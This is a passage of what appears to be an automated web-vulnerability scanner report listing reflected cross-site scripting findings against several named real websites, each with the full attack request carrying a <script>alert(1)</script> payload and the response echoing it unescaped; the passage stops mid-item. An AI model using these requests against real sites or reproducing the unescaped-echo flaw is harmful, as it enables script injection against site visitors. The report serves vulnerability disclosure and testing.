Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:42 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fsh
...[SNIP]...

4.120. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e317"><script>alert(1)</script>d1da29fd1e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:48 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40
...[SNIP]...

4.121. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22431"><script>alert(1)</script>39b00191ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:45 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js" type="hidden" />
...[SNIP]...

4.122. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e21"><script>alert(1)</script>f034d66f85a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:53 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js" type="hidden" />
...[SNIP]...

4.123. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b62b0"><script>alert(1)</script>d0f3b71f96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js" type="hidden" />
...[SNIP]...

4.124. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88615"><script>alert(1)</script>175578b2d1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c" type="hidden" />
...[SNIP]...

4.125. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71af9"><script>alert(1)</script>54fe96e1c71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:52 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2" type="hidden" />
...[SNIP]...

4.126. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29665"><script>alert(1)</script>4685965d83d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2" type="hidden" />
...[SNIP]...

4.127. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfa3"><script>alert(1)</script>f6fd26bb8b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2" type="hidden" />
...[SNIP]...

4.128. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761c1"><script>alert(1)</script>3e557343cc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2" type="hidden" />
...[SNIP]...

4.129. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df85"><script>alert(1)</script>7f18c5be575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:13 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2" type="hidden" />
...[SNIP]...

4.130. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3070f"><script>alert(1)</script>9d19976bc93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:17 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2" type="hidden" />
...[SNIP]...

4.131. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69123"><script>alert(1)</script>fab6770260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?69123"><script>alert(1)</script>fab6770260=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2hrmotl33mdjrmgcj2rrd55mg4; path=/
Vary: Accept-Encoding
Content-Length: 21572
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<form action="/login.php?return=/login.php?return=/submit.php?69123"><script>alert(1)</script>fab6770260=1" method="post">
...[SNIP]...

4.132. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 145ae--><script>alert(1)</script>51dbf0ddac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ns53ppdrjhtvontg84lgr82rl4; path=/
Vary: Accept-Encoding
Content-Length: 21511
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<a href="/login.php?return=/login.php?return=/submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1">
...[SNIP]...

4.133. http://www.hawaii.edu/cybersecurity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /cybersecurity/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72768"><script>alert(1)</script>6cb577da8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cybersecurity72768"><script>alert(1)</script>6cb577da8e/ HTTP/1.1
Host: www.hawaii.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:18:20 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6367
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/cybersecurity72768"><script>alert(1)</script>6cb577da8e/" size="60">
...[SNIP]...

4.134. http://www.hawaii.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed25"><script>alert(1)</script>b6c02b9894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico5ed25"><script>alert(1)</script>b6c02b9894 HTTP/1.1
Host: www.hawaii.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:32:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6364
Content-Type: text/html

